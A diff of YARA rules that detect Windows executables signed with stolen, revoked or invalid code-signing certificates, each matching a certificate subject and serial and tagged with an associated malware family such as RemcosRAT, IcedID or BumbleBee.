-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1231-L1242"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7861-L7874"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1a43e85e8c8d254dc3ba48ee9be5c233818fd6137967cd0235e802a2de1f9564"
+		logic_hash = "fe06e8f6fd87d5a9044a6ff609da73b7d9e7d1f07cc9e84ee2fd2940be615323"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d5e8afa85c6bf68d31af4a04668c3391e48b24b7"
+		thumbprint = "0ee11d5917c486b7a57b7c3c566acec251170e98a577164f36b7d7d34f035499"
+		reason = "NetSupport"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB0\\x94\\xE5\\x93\\xA6\\xD0\\x93\\xE8\\x89\\xBE\\xE5\\xB1\\x81\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE5\\xB1\\x81\\xE5\\x93\\xA6\\xE7\\xBB\\xB4\\xE5\\x93\\xA6\\xE8\\x89\\xBE\\xE5\\xB0\\x94\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:c8:65:d4:93:45:f1:ed:9a:84:be:a4:07:43:cd:f1:d7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhynedahll Software LLC" and pe.signatures [ i ] . serial == "65:1f:3e:5b:49:1b:19:7d:20:c4:9b:9c:7b:25:b7:75" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_29F2093E925B7Fe70A9Ba7B909415251 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_67936A84Bed66Ef021Dbe771De331772 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "51c21421-18e4-52df-8fe7-75db7141824c"
+		id = "2739308a-7396-5fe2-bf1b-fe7e6e5d1f80"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1244-L1255"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7876-L7889"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b3c6a0571c096e431594d9331b3ae8127b02cc3cdf1e994a113026d77bbae4c"
+		logic_hash = "da149e6835be937e0bf2763052d4cbabb367910061aec3c394dffaa45d9b0ac6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f9fc647988e667ec92bdf1043ea1077da8f92ccc"
+		thumbprint = "8fff75906628b764e99a7a028112a8ec7794097e564f0f897c24c2baaa82ded8"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x99\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xE4\\xB8\\x9D\\xD0\\x99\\xE8\\x89\\xBE\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xE5\\x85\\x8B\\xD0\\x9D\\xD0\\x9D\\xD0\\x9D\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "29:f2:09:3e:92:5b:7f:e7:0a:9b:a7:b9:09:41:52:51" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APEX SOFTWARE DESIGN, LLC" and pe.signatures [ i ] . serial == "67:93:6a:84:be:d6:6e:f0:21:db:e7:71:de:33:17:72" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0889E4181E71B16C4A810Bee38A78419 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_8538A6C5018F50Fc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e9ada9f1-4b52-5da6-ba82-3ea2625ccefd"
+		id = "8790c06a-3b7a-5e40-9a9c-0f2064029daf"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1257-L1268"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7891-L7904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2411f7ac79d18af295d77078c6e1c98c5a116ab24125c08946cb6ca09c28bc7b"
+		logic_hash = "2ef3c7a45eb1d46e6c159ec9692fa5c17ff7679f41d96d04de52aa52ce96fa6b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bce3c17815ec9f720ba9c59126ae239c9caf856d"
+		thumbprint = "d42519dac24abc5c1ebfc6e0da0fd2e7cfb9db50c0598948c6630fdc132c7f94"
+		reason = "Malware"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE5\\xBC\\x97\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE5\\x90\\xBE" and pe.signatures [ i ] . serial == "08:89:e4:18:1e:71:b1:6c:4a:81:0b:ee:38:a7:84:19" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trading Technologies International, Inc." and pe.signatures [ i ] . serial == "85:38:a6:c5:01:8f:50:fc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C1Afabdaa1321F815Cdbb9467728Bc08 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Fecc3B3C675F7Ffd7De22507F3Fdacd7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e7904179-672a-5668-8b6d-f7f7090678fb"
+		id = "b91a7dcd-6212-5750-9bc8-0eb37d9e129b"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1270-L1281"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7906-L7919"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be637a192a90a35be9879d5e36fb3cf9a56ca4158329d6b1fad458e2d05e3d26"
+		logic_hash = "1319f4ccb5ab07c1c538d6a183fa25726b3d42192eaa878a2c402be2c93219f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e9c5fb9a7d3aba4b49c41b45249ed20c870f5c9e"
+		thumbprint = "6b8cc2be066ff0bf1d884892fc600482fc34eaddb3a5e6681b509d64795b01d4"
+		reason = "RemcosRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xD0\\x93\\xE5\\x84\\xBF\\xD0\\x93\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\x8B\\x92\\xD0\\x93\\xD0\\x93\\xE5\\x84\\xBF\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x93\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x92\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93\\xE8\\x89\\xBE\\xE9\\xA9\\xAC\\xD0\\x93" and pe.signatures [ i ] . serial == "00:c1:af:ab:da:a1:32:1f:81:5c:db:b9:46:77:28:bc:08" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gromit Electronics Limited" and pe.signatures [ i ] . serial == "fe:cc:3b:3c:67:5f:7f:fd:7d:e2:25:07:f3:fd:ac:d7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_371381A66Fb96A07077860Ae4A6721E1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5294F0F841F29855E33A18402421949A : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cd9c9965-922c-5ced-839c-97d1dcde33ff"
+		id = "3153f039-afd2-5eb5-b090-b205d9778eb7"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1283-L1294"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7921-L7934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f087df37fdb6d921f411f130f26f9b5a58c36ae163bc88565178e0ed12be79d9"
+		logic_hash = "b9d2b10c4117de276cb41148b41921115f414aa17e261956c8550adf6127d5b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c4419f095ae93d93e145d678ed31459506423d6a"
+		thumbprint = "df744f6b9430237821e3f2bc6edafb4a92354dda1734a60d5e0d816256aefb47"
+		reason = "RemcosRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xBB\\xB4\\xD0\\xA9\\xE5\\x90\\xBE\\xE7\\xBB\\xB4\\xD0\\xA9\\xD0\\xA9\\xE7\\xBB\\xB4\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xD0\\xA9\\xE5\\xA8\\x9C\\xE6\\x9D\\xB0\\xE5\\xA8\\x9C\\xE5\\x90\\xBE\\xE5\\xA8\\x9C\\xE5\\xA8\\x9C\\xD0\\xA9" and pe.signatures [ i ] . serial == "37:13:81:a6:6f:b9:6a:07:07:78:60:ae:4a:67:21:e1" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Integrated Plotting Solutions Limited" and pe.signatures [ i ] . serial == "52:94:f0:f8:41:f2:98:55:e3:3a:18:40:24:21:94:9a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Deb004E56D7Fcec1Caa8F2928D4E768 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1614Ef66B2C4B886E71A93Dd34869F48 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bb4e62b1-3528-56db-b004-1d590ad1ee61"
+		id = "27bead15-f7fa-55a1-9347-ea551e1e0e18"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1296-L1307"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7936-L7949"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "69910c81ce85bc59972b644f548a4382b8f3b70ec2737ada9da7adcb4779ce9c"
+		logic_hash = "26265d54d8b58128c1a9a3b322f339d1beb438f403637519b11ff324af91d1e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "21dacc55b6e0b3b0e761be03ed6edd713489b6ce"
+		thumbprint = "1689697e08dda6d1233c0056078ddf25b12c3608ead7d96ed4cbbb074e54ce29"
+		reason = "RemcosRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "0d:eb:00:4e:56:d7:fc:ec:1c:aa:8f:29:28:d4:e7:68" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHIRT AND CUFF LIMITED" and pe.signatures [ i ] . serial == "16:14:ef:66:b2:c4:b8:86:e7:1a:93:dd:34:86:9f:48" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7Bd36898217B4Cc6B6427Dd7C361E43D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_65Cfd8419D70Ce4011D97Bc79D18315E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ff5be4ad-9471-5d9f-a1ad-ed7aca345a7f"
+		id = "2368b3d1-1cd5-575b-a3ff-270349563d1a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1309-L1320"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7951-L7964"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ff149b5a12e154c0ede5015a0432fb70d6001507356c006952e8db91afaa72d"
+		logic_hash = "675ab6ef0f744f62db892992c6b3614e14b95f64e2800a0d10e55b915a2b4e74"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c55df31aa16adb1013612ceb1dcf587afb7832c3"
+		thumbprint = "7cff10e37a43843e971f02ca6ad6510f08a5209d21745181fc4d003a8287cd1b"
+		reason = "BumbleBee"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeafefcafbafbaf" and pe.signatures [ i ] . serial == "7b:d3:68:98:21:7b:4c:c6:b6:42:7d:d7:c3:61:e4:3d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FACE AESTHETICS LTD" and pe.signatures [ i ] . serial == "65:cf:d8:41:9d:70:ce:40:11:d9:7b:c7:9d:18:31:5e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_02D17Fbf4869F23Fea43C7863902Df93 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_01Cf0B0F01B20B70Bfaa69722979Ef5C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6e96f5b2-f3de-5d5a-babe-d46b9e3edd3e"
+		id = "23f5047d-b8f9-5f17-9add-6e29dce9a976"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1322-L1333"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7966-L7979"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a66e10934cc58e364a694dde3865d0de33e61ce0128ef144c61fa5728d22b8f8"
+		logic_hash = "5942c0196d7264783590c599ccfb0fe6518b338238ddb3df4e4f8999922ce86b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d336ff8d8ccb771943a70bb4ba11239fb71beca5"
+		thumbprint = "ef10480ab6448e60bdc689fc54cb6cfc4a8e1d39ddc788ce3d060ab4b7d30b59"
+		reason = "Ryuk"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . serial == "02:d1:7f:bf:48:69:f2:3f:ea:43:c7:86:39:02:df:93" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET PLUS PTY LTD" and pe.signatures [ i ] . serial == "01:cf:0b:0f:01:b2:0b:70:bf:aa:69:72:29:79:ef:5c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1E74Cfe7De8C5F57840A61034414Ca9F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_698Ff388Adb50B88Afb832E76B0A0Ad1 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b46992d5-f4fb-5e51-8f3c-eb87d4397f14"
+		id = "8118e0ee-6214-54f3-b025-234f9e685832"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1335-L1346"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7981-L7994"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14f57732a82b5139059bbe6f713184659187b57419d79e85a12ab197def4b761"
+		logic_hash = "7734256201739dece5ae039d45ed79c74be6228f7da51fc82c0cfd2d4aacfd4b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2dfa711a12aed0ace72e538c57136fa021412f95951c319dcb331a3e529cf86e"
+		thumbprint = "479e01dde7e7529ed4ad111a2d7b3b16fdc6fbe2ed0d6ff015c1c823ca0939db"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_009272607Cfc982B782A5D36C4B78F5E7B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5143Cf38D5Fd26858830826632Be9Fda : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dfb01400-dff2-5df1-b38e-7eb2ee2c71b8"
+		id = "653a969a-9aed-5a26-9962-92bc173ddfdd"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1348-L1359"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7996-L8009"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1c2b44e782befc8dae6852935b6f5b0071c13dd9b56857c38cb290c9069df18"
+		logic_hash = "b6f33fd94f8098ca9d4fe98b3dc0a833f0be78fe854c62d715b98a2ba980b8ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2514c615fe54d511555bc5b57909874e48a438918a54cea4a0b3fbc401afa127"
+		thumbprint = "57a8aa854f3198f069bb34bc763b7773a8cfdafb562ee0ccf24a5067d45d5e3c"
+		reason = "BumbleBee"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGI CORP MEDIA LLC" and pe.signatures [ i ] . serial == "51:43:cf:38:d5:fd:26:85:88:30:82:66:32:be:9f:da" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7B91468122273Aa32B7Cfc80C331Ea13 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3628B93Bcd902B6B3E1Ffdf2E13Dfcf5 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4369d88d-f592-5a5a-bdf6-c63b77d45326"
+		id = "8b8fa36d-181b-57a1-853e-ab11a5127fd7"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1361-L1372"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8011-L8024"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c0fa18edb23c6a7474185adc67101ad9b13c71188f25612165cb97d236562d8"
+		logic_hash = "bf9b2ab7a379437daa04565fdf7adc04db2f6f1a6284d1fd91f037b255523c42"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "409f32dc91542546e7c7f85f687fe3f1acffdd853657c8aa8c1c985027f5271d"
+		thumbprint = "27b75dc1d31a581f6e02bba3c03a62174ee4456021c7de50922caa10b98f8f7a"
+		reason = "Malware"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "36:28:b9:3b:cd:90:2b:6b:3e:1f:fd:f2:e1:3d:fc:f5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0082Cb93593B658100Cdd7A00C874287F2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3e618656-6c9d-5172-bad4-f507cec1dc0c"
+		id = "f0baf7ea-7022-5834-a46c-b67bfbe706d0"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1374-L1385"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8026-L8039"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "df8eb4feef3992bae7097a05860f57a1408fc79d92741e3ea2f202d072d9f47e"
+		logic_hash = "438667b55f23b689627fc1e5bce0e53b960ef51d1a7d3203e398c59bd94ffe93"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d168d7cf7add6001df83af1fc603a459e11395a9077579abcdfd708ad7b7271f"
+		thumbprint = "f7a578c93fd98ade3d259ac47f152d8c9115bc5df7e2f57d107a66db3f833f0f"
+		reason = "NetSupport RAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Df683D46D8C3832489672Cc4E82D3D5D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_17Ccecc181Ed65A357Edf3B01Df62Cc9 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "532ee72a-00f6-513e-b4f9-0827f77d643e"
+		id = "b692d8dd-e7c9-53cb-8c65-0001c2af3f6f"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1387-L1398"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8041-L8054"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "153fdb25769d912732a1fb4ecc757fc8c7e4766cd6588ea16d9cf642b4be8bf6"
+		logic_hash = "d79968633717744ab9e9006f8d958c1e240a1e0f99fd0b4c603d42bb7cd4773c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8b63c5ea8d9e4797d77574f35d1c2fdff650511264b12ce2818c46b19929095b"
+		thumbprint = "b64bd77a58c90f76afd6c4ce0b38c54c3c6088b818d0b83e5435d89e3dc01cda"
+		reason = "RedLineStealer"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osatokio Oy" and pe.signatures [ i ] . serial == "00:df:68:3d:46:d8:c3:83:24:89:67:2c:c4:e8:2d:3d:5d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "17:cc:ec:c1:81:ed:65:a3:57:ed:f3:b0:1d:f6:2c:c9" )
 }
 
